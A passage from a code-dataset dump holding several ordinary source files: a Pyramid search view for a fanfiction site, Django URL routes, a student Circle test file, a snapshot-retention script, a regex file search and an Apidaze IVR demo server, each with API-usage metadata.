16, "usage_type": "call"}, {"api_name": "astropy.units", "line_number": 16, "usage_type": "name"}, {"api_name": "astropy.units.m", "line_number": 18, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 18, "usage_type": "name"}, {"api_name": "astropy.units.m", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 19, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "astropy.table.Table.read", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 27, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 27, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "astropy.table.Table.read", "line_number": 36, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 36, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 36, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "astropy.table.Table.read", "line_number": 46, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 46, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "os.symlink", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "174804826", "text": "from filteredfanfiction.models.models import DBSession, Language, Genre, Race, Character, Rating, Category\nfrom pyramid.view import view_config\nfrom filteredfanfiction.helpers.search_term_validator import SearchTermValidator\nfrom filteredfanfiction.helpers.mobiledetector import is_mobile\nimport transaction\n \n@view_config(route_name='searchstate', renderer='json', request_method='GET')\n@view_config(route_name='savedsearchstate', renderer='json', request_method='GET')\ndef SearchState(request):\n session = DBSession()\n request.add_finished_callback(RequestCleanup)\n validator = SearchTermValidator(session, matchdict = request.matchdict)\n characters = session.query(Character).filter(Character.categoryid == validator.category).order_by(Character.name)\n category = session.query(Category).filter(Category.idcategory == validator.category).first()\n\n results = dict()\n results['category'] = { 'name': category.name, 'id': category.idcategory }\n results['query'] = validator.query\n results['completeRequired'] = validator.completeRequired\n\n reqdGenres = validator.requiredGenresSet\n reqdGenreList = [] if len(reqdGenres) == 0 else [g for g in session.query(Genre).filter(Genre.idgenre.in_(reqdGenres)).order_by(Genre.name)]\n\n otherGenresSet = validator.otherGenresSet \n otherGenres = otherGenresSet[0] - reqdGenres\n otherGenreList = [] if len(otherGenres) == 0 else [g for g in session.query(Genre).filter(Genre.idgenre.in_(otherGenres)).order_by(Genre.name)]\n\n usedGenres = reqdGenres | otherGenres\n usedGenreQuery = session.query(Genre)\n if len(usedGenres) > 0:\n usedGenreQuery = usedGenreQuery.filter(~Genre.idgenre.in_(usedGenres))\n\n results['genres'] = {'required': [{'name': genre.name, \n 'id': genre.idgenre}\n for genre in reqdGenreList],\n 'other': [{'name': genre.name, \n 'id': genre.idgenre}\n for genre in otherGenreList],\n 'otherIsExclude': otherGenresSet[1],\n 'unused': [{'name': genre.name, \n 'id': genre.idgenre}\n for genre in usedGenreQuery.order_by(Genre.name)]}\n \n reqdChars = validator.requiredCharactersSet\n reqdCharList = [] if len(reqdChars) == 0 else [c for c in session.query(Character).filter(Character.idcharacter.in_(reqdChars)).order_by(Character.name).outerjoin(Race).add_column(Race.name)]\n \n otherCharsSet = validator.otherCharactersSet \n otherChars = otherCharsSet[0] - reqdChars\n otherCharList = [] if len(reqdChars) == 0 else [c for c in session.query(Character).filter(Character.idcharacter.in_(otherChars)).order_by(Character.name).outerjoin(Race).add_column(Race.name)]\n\n usedChars = reqdChars | otherChars\n usedCharQuery = session.query(Character).filter(Character.categoryid == category.idcategory).outerjoin(Race).add_column(Race.name)\n if len(usedChars) > 0:\n usedCharQuery = usedCharQuery.filter(~Character.idcharacter.in_(usedChars))\n\n results['characters'] = {'required': [{'name': character.name, \n 'id': character.idcharacter,\n 'gender': character.gender,\n 'race': (\"Unknown\" if raceName is None else raceName)}\n for (character, raceName) in reqdCharList],\n 'other': [{'name': character.name, \n 'id': character.idcharacter,\n 'gender': character.gender,\n 'race': (\"Unknown\" if raceName is None else raceName)}\n for (character, raceName) in otherCharList],\n 'otherIsExclude': otherCharsSet[1],\n 'unused': [{'name': character.name, \n 'id': character.idcharacter,\n 'gender': character.gender,\n 'race': (\"Unknown\" if raceName is None else raceName)}\n for (character, raceName) in usedCharQuery.order_by(Character.name)]}\n \n results['knownGenders'] = [\"Male\", \"Female\", \"Object\"];\n knownRaces = set([c['race'] for c in results['characters']['required']])\n knownRaces.update([c['race'] for c in results['characters']['other']])\n knownRaces.update([c['race'] for c in results['characters']['unused']])\n results['knownRaces'] = sorted(knownRaces)\n\n checkedRatings = validator.ratingsSet\n results['ratings'] = [{ 'name': rating.name,\n 'id': rating.idrating,\n 'selected': rating.idrating in checkedRatings}\n for rating in session.query(Rating).order_by(Rating.idrating)]\n\n checkedLanguages = validator.languagesSet\n results['languages'] = [{ 'name': language.name,\n 'id': language.idlanguage,\n 'selected': language.idlanguage in checkedLanguages}\n for language in session.query(Language).order_by(Language.name)]\n\n activeOption = validator.sortOption\n results['sorting'] = { 'reverseOrder': validator.sortOrder == \"asc\",\n 'options': [{ 'name': \"Average DLP Score\",\n 'id': \"dlpavgscore\",\n 'selected': \"dlpavgscore\" == activeOption}, \n { 'name': \"Average Reviews\",\n 'id': \"avgreviews\",\n 'selected': \"avgreviews\" == activeOption},\n { 'name': \"Chapters\", \n 'id': \"chapters\",\n 'selected': \"chapters\" == activeOption}, \n { 'name': \"Chapter Length\", \n 'id': \"chapterlength\",\n 'selected': \"chapterlength\" == activeOption},\n { 'name': \"Published\",\n 'id': \"published\",\n 'selected': \"published\" == activeOption},\n { 'name': \"Reviews\", \n 'id': \"reviews\",\n 'selected': \"reviews\" == activeOption}, \n { 'name': \"Total DLP Reviews\", \n 'id': \"dlpvotes\",\n 'selected': \"dlpvotes\" == activeOption}, \n { 'name': \"Total DLP Score\", \n 'id': \"dlpscore\",\n 'selected': \"dlpscore\" == activeOption},\n { 'name': \"Updated\",\n 'id': \"updated\",\n 'selected': \"updated\" == activeOption}, \n { 'name': \"Update Speed\",\n 'id': \"speed\",\n 'selected': \"speed\" == activeOption}, \n { 'name': \"Words\",\n 'id': \"words\",\n 'selected': \"words\" == activeOption} ]}\n\n results['ranges'] = { 'chapters': { 'min': validator.min(validator.chapters),\n 'max': validator.max(validator.chapters)},\n 'words': { 'min': validator.min(validator.words),\n 'max': validator.max(validator.words)},\n 'length': { 'min': validator.min(validator.chapterLength),\n 'max': validator.max(validator.chapterLength)},\n 'reviews': { 'min': validator.min(validator.reviews),\n 'max': validator.max(validator.reviews)},\n 'avgreviews': { 'min': validator.min(validator.averageReviews),\n 'max': validator.max(validator.averageReviews)},\n 'dlpvotes': { 'min': validator.min(validator.dlpVotes),\n 'max': validator.max(validator.dlpVotes)},\n 'dlpscore': { 'min': validator.min(validator.dlpScore),\n 'max': validator.max(validator.dlpScore)},\n 'dlpavgscore': { 'min': validator.minFloat(validator.dlpAvgScore),\n 'max': validator.maxFloat(validator.dlpAvgScore)} }\n \n return results\n\ndef RequestCleanup(request):\n if request.exception is not None:\n transaction.abort()\n else:\n transaction.commit()\n DBSession.Finalize()\n\n", "sub_path": "filteredfanfiction/views/ajax.py", "file_name": "ajax.py", "file_ext": "py", "file_size_in_byte": 9631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "filteredfanfiction.models.models.DBSession", "line_number": 10, "usage_type": "call"}, {"api_name": "filteredfanfiction.helpers.search_term_validator.SearchTermValidator", "line_number": 12, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 13, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.categoryid", "line_number": 13, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Category", "line_number": 14, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Category.idcategory", "line_number": 14, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 22, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre.in_", "line_number": 22, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre", "line_number": 22, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre.name", "line_number": 22, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 26, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre.in_", "line_number": 26, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre", "line_number": 26, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre.name", "line_number": 26, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 29, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre.in_", "line_number": 31, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre", "line_number": 31, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 31, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Genre.name", "line_number": 42, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 42, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Race", "line_number": 45, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 45, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter.in_", "line_number": 45, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter", "line_number": 45, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 45, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race.name", "line_number": 45, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race", "line_number": 49, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 49, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter.in_", "line_number": 49, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter", "line_number": 49, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 49, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race.name", "line_number": 49, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race", "line_number": 52, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 52, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.categoryid", "line_number": 52, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race.name", "line_number": 52, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter.in_", "line_number": 54, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter", "line_number": 54, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 54, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 71, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 71, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Rating", "line_number": 83, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Rating.idrating", "line_number": 83, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Language", "line_number": 89, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Language.name", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pyramid.view.view_config", "line_number": 7, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 8, "usage_type": "call"}, {"api_name": "transaction.abort", "line_number": 148, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 150, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.DBSession.Finalize", "line_number": 151, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.DBSession", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "628091612", "text": "# -*- coding:utf-8 -*-\n\"\"\"\n@author:zhouqiuhong\n@file:urls.py\n@time:2018/8/7 000718:13\n\"\"\"\nfrom django.conf.urls import url, include\nfrom .views import OrgView, UserAskView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView, TeacherListView\nfrom .views import TeacherDetailView\n\nurlpatterns = [\n url(r\"^list/$\", OrgView.as_view(), name=\"org_list\"),\n url(r\"^add_ask/$\", UserAskView.as_view(), name=\"add_ask\"),\n url(r\"^home/(?P\\d+)/$\", OrgHomeView.as_view(), name=\"org_home\"),\n url(r\"^course/(?P\\d+)/$\", OrgCourseView.as_view(), name=\"org_course\"),\n url(r\"^desc/(?P\\d+)/$\", OrgDescView.as_view(), name=\"org_desc\"),\n url(r\"^org_teacher/(?P\\d+)/$\", OrgTeacherView.as_view(), name=\"org_teacher\"),\n #用户收藏\n url(r\"^add_fav/$\", AddFavView.as_view(), name=\"add_fav\"),\n #讲师列表页\n url(r\"^teacher/list/$\", TeacherListView.as_view(), name=\"teacher_list\"),\n #讲师详情页面\n url(r\"^teacher/detail/(?P\\d+)/$\", TeacherDetailView.as_view(), name=\"teacher_detail\"),\n]", "sub_path": "apps/organization/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "views.OrgView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "views.OrgView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "views.UserAskView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "views.UserAskView", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "views.OrgHomeView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.OrgHomeView", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "views.OrgCourseView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.OrgCourseView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "views.OrgDescView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.OrgDescView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "views.OrgTeacherView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.OrgTeacherView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "views.AddFavView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.AddFavView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "views.TeacherListView.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "views.TeacherListView", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "views.TeacherDetailView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "views.TeacherDetailView", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "609413578", "text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'Series'\n\nurlpatterns = [\n\turl('chapter/(?P[-\\w]+)/$', views.ChapterDetailView.as_view(), name=\"ChapterDetail\"),\n\turl('serie/(?P[-\\w]+)/$', views.SerieDetailView.as_view(), name=\"SerieDetail\"),\n\turl('series/$', views.SeriesListView.as_view(), name=\"SeriesList\"),\n]", "sub_path": "series/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "407587726", "text": "from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (DepartmentViewSet, RoomViewSet, UserViewSet,\n UserInfoView, PermissionsView)\n\n\napp_name = 'account'\n\nrouter = DefaultRouter()\nrouter.register('department', DepartmentViewSet, base_name='department')\nrouter.register('room', RoomViewSet, base_name='room')\nrouter.register('user', UserViewSet, base_name='user')\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('info/', UserInfoView.as_view()),\n path('permission/', PermissionsView.as_view())\n]\n", "sub_path": "account/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 10, "usage_type": "call"}, {"api_name": "views.DepartmentViewSet", "line_number": 11, "usage_type": "argument"}, {"api_name": "views.RoomViewSet", "line_number": 12, "usage_type": "argument"}, {"api_name": "views.UserViewSet", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.UserInfoView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.UserInfoView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.PermissionsView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.PermissionsView", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "175855111", "text": "#!/usr/bin/env python3\n\n\"\"\" Test code for sparse_array.py.\"\"\"\n\nimport pytest\nfrom sparse_array import *\n\ndef test_radius():\n c = Circle(4)\n \n print(c.radius)\n assert c.radius == 4\n\ndef test_diameter():\n c = Circle(4)\n \n print(c.diameter)\n assert c.diameter == 8\n\ndef test_set_diameter():\n c = Circle(4)\n \n c.diameter = 2\n print(c.diameter)\n print(c.radius)\n \n assert c.diameter == 2\n assert c.radius == 1\n\ndef test_area():\n c = Circle(4)\n \n print(c.area)\n assert c.area == 50.27\n\ndef test_set_area():\n c = Circle(4)\n \n with pytest.raises(AttributeError):\n c.area = 42\n \n print(c.area)\n\ndef test_from_diameter():\n c = Circle.from_diameter(8)\n \n print(c.diameter)\n print(c.radius)\n \n assert c.diameter == 8\n assert c.radius == 4\n\ndef test_print():\n c = Circle(4)\n d = eval(repr(c))\n \n print(c)\n print(repr(c))\n print(d)\n \n assert c == 'Circle with radius: 4.000000'\n assert repr(c) == \"'Circle(4)'\"\n assert d == 'Circle(4)'\n\ndef test_math():\n c1 = Circle(2)\n c2 = Circle(4)\n \n print(c1 + c2)\n print(c2 * 3)\n print(3 * c2)\n \n assert c1 + c2 == Circle(6)\n assert c2 * 3 == Circle(12)\n #add assert to deal with 3 * c2\n\ndef test_compare():\n c1 = Circle(2)\n c2 = Circle(4)\n c3 = Circle(4)\n \n assert c1 > c2 is False\n assert c1 < c2 is True\n assert c1 == c2 is False\n assert c2 == c3 is True\n\ndef test_sort():\n circles = [Circle(2), Circle(4), Circle(4), Circle(3), Circle(8), Circle(6)]\n circles.sort()\n print(circles)\n \n assert circles == [Circle(2), Circle(3), Circle(4), Circle(4), Circle(6), Circle(8)]\n\n#def test_sphere_subclass():\n #add tests for sphere subclass", "sub_path": "students/thecthaeh/Lesson08/test_sparse_array.py", "file_name": "test_sparse_array.py", "file_ext": "py", "file_size_in_byte": 1766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.raises", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "557677015", "text": "import sys\nimport requests\nimport json\nfrom datetime import datetime as dt\n\ntime_format='%Y-%m-%dT%H:%M:%S.%fZ'\ndatabaseName='databaseName'\ncreation='createdAt'\nsnapshots_path = None\nserver= None\n\ndef get_json_data():\n response = requests.get(server+snapshots_path)\n if (response.status_code >= 200 and response.status_code <= 299):\n return json.loads(response.text)['snapshotItems']\n else:\n print(f'Response code: {response.status_code}')\n exit(1)\n\ndef list_all_by_DB():\n snapshots={}\n json=get_json_data()\n time_sorted_snaps = sorted(json, key=lambda x: dt.strptime(x[creation], time_format), reverse=True)\n for obj in time_sorted_snaps:\n db=obj[databaseName]\n if not db in snapshots:\n snapshots[db]=[]\n snapshots[db].append(obj)\n return snapshots\n\ndef do_by_id(id,method):\n if(method=='GET'):\n response = requests.get(server+snapshots_path+str(id))\n if (response.status_code >= 200 and response.status_code <= 299):\n print(response.text)\n return True\n else:\n print(f'Response code: {response.status_code}')\n elif (method=='DELETE'):\n response = requests.delete(server+snapshots_path+str(id))\n if (response.status_code >= 200 and response.status_code <= 299):\n return True\n else:\n print(f'Response code: {response.status_code}')\n\ndef main(argv):\n global server\n server = argv[1] #'https://5dbf2fb9e295da001400b4cc.mockapi.io'\n global snapshots_path\n snapshots_path = argv[2] #'/api/v1/snapshots/'\n all_snaps=list_all_by_DB()\n for db_name in all_snaps:\n db=all_snaps[db_name]\n if len(db) > 2:\n i=1\n for snap in db[2:]:\n do_by_id(int(snap['id']),'DELETE')\n\n print(\"done\")\nif __name__ == '__main__':\n main(sys.argv)", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.delete", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "427034709", "text": "#! python3\n\nimport argparse\nimport re, sys\nimport os\n\n\ndef search_files(words, file, reg):\n # print(words)\n # create regex object\n # search file for regex pattern and return to caller if found\n regex = \"r\\'\" + reg + \"\\'\"\n # print(regex)\n\n try:\n regex = re.compile(reg)\n for word in words:\n # print(word)\n found = regex.search(word)\n if found:\n print(found.group(), file)\n except Exception as e:\n print(\"Error is: \" + str(e))\n\n\ndef parseArg():\n parser = argparse.ArgumentParser(usage=sys.argv[0] + ' -r [-h]')\n parser.add_argument('-r', dest='reg', help='specify regex string to search')\n options = parser.parse_args()\n reg = options.reg\n if reg is None:\n print(parser.usage)\n else:\n return reg\n\n\ndef main():\n files_found = []\n regex_string = parseArg()\n text_files = [x for x in os.listdir('.') if os.path.basename(x).endswith('.txt')]\n # print(text_files)\n for file in text_files:\n with open(file, 'r') as f:\n file_contents = f.read()\n words = [x for x in str(file_contents).split(' ')]\n # print(file_contents)\n files_found.append(search_files(words, file, regex_string))\n\n\nif __name__ == \"__main__\":\n main()", "sub_path": "PycharmProjects/AutoBoringStuff/regexSearch.py", "file_name": "regexSearch.py", "file_ext": "py", "file_size_in_byte": 1315, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "590566841", "text": "from apidaze.script import Builder, Record, Answer, Echo, Speak, Wait\nfrom apidaze.script import Bind, SpeakLanguages, Conference, Playback, Ringback\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n\ndef intro(localurl):\n builder = Builder()\n ringback = Ringback(file='FR')\n wait8 = Wait(8)\n answer = Answer()\n record = Record(name='example_recording')\n wait = Wait(delay=2)\n playback = Playback(file=f'{localurl}/apidazeintro.wav')\n speak = Speak(text='This example script will show you some things you can do with our API')\n\n builder.add(ringback).add(wait8).add(answer).add(record).add(wait).add(\n playback).add(speak).add(wait)\n\n speak = Speak(text='Press 1 for an example of text to speech, press 2 to enter an echo line to check voice latency or press 3 to enter a conference.')\n bind1 = Bind(action=f'{localurl}/step1.xml', text='1')\n bind2 = Bind(action=f'{localurl}/step2.xml', text='2')\n bind3 = Bind(action=f'{localurl}/step3.xml', text='3')\n speak.add(bind1).add(bind2).add(bind3)\n\n builder.add(speak)\n\n return str(builder)\n\n\ndef step1():\n builder = Builder()\n speak = Speak(text=\"Our text to speech leverages Google's cloud APIs to offer the best possible solution\")\n wait1 = Wait(delay=1)\n\n builder.add(speak).add(wait1)\n\n speak = Speak(text='A wide variety of voices and languages are available. Here are just a few', lang=SpeakLanguages.en_AU)\n builder.add(speak).add(wait1)\n\n speak = Speak(lang=SpeakLanguages.fr_FR, text='Je peux parler français')\n builder.add(speak).add(wait1)\n\n speak = Speak(lang=SpeakLanguages.de_DE, text='Auch deutsch')\n builder.add(speak).add(wait1)\n\n speak = Speak(lang=SpeakLanguages.ja_JP, text='そして日本人ですら')\n builder.add(speak).add(wait1)\n\n speak = Speak(text=\"You can see our documentation for a full list of supported languages and voices for them. We'll take you back to the menu for now.\")\n wait2 = Wait(2)\n\n builder.add(speak).add(wait2)\n return str(builder)\n\n\ndef step2():\n builder = Builder()\n speak = Speak(text='You will now be joined to an echo line.')\n echo = Echo()\n builder.add(speak).add(echo)\n return str(builder)\n\n\ndef step3():\n builder = Builder()\n speak = Speak('You will be entered into a conference call now. You can initiate more calls to join participants or hangup to leave')\n conf = Conference(room='SDKTestConference')\n builder.add(speak).add(conf)\n return str(builder)\n\n\nclass Handler(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/xml\")\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n if self.path == '/':\n self.wfile.write(intro('http://localhost').encode('utf-8'))\n elif self.path == '/step1.xml':\n self.wfile.write(step1().encode('utf-8'))\n elif self.path == '/step2.xml':\n self.wfile.write(step2().encode('utf-8'))\n elif self.path == '/step3.xml':\n self.wfile.write(step3().encode('utf-8'))\n\n\nport = 8080\nhandler = Handler\n\nhttpd = HTTPServer((\"\", port), handler)\nhttpd.serve_forever()\n\n", "sub_path": "examples/ivr_demo_example.py", "file_name": "ivr_demo_example.py", "file_ext": "py", "file_size_in_byte": 3217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "apidaze.script.Builder", "line_number": 7, "usage_type": "call"}, {"api_name": "apidaze.script.Ringback", "line_number": 8, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 9, "usage_type": "call"}, {"api_name": "apidaze.script.Answer", "line_number": 10, "usage_type": "call"}, {"api_name": "apidaze.script.Record", "line_number": 11, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 12, "usage_type": "call"}, {"api_name": "apidaze.script.Playback", "line_number": 13, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 14, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 19, "usage_type": "call"}, {"api_name": "apidaze.script.Bind", "line_number": 20, "usage_type": "call"}, {"api_name": "apidaze.script.Bind", "line_number": 21, "usage_type": "call"}, {"api_name": "apidaze.script.Bind", "line_number": 22, "usage_type": "call"}, {"api_name": "apidaze.script.Builder", "line_number": 31, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 32, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 33, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 37, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.en_AU", "line_number": 37, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 37, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 40, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.fr_FR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 40, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 43, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.de_DE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 43, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 46, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.ja_JP", "line_number": 46, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 46, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 49, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 50, "usage_type": "call"}, {"api_name": "apidaze.script.Builder", "line_number": 57, "usage_type": "call"}, 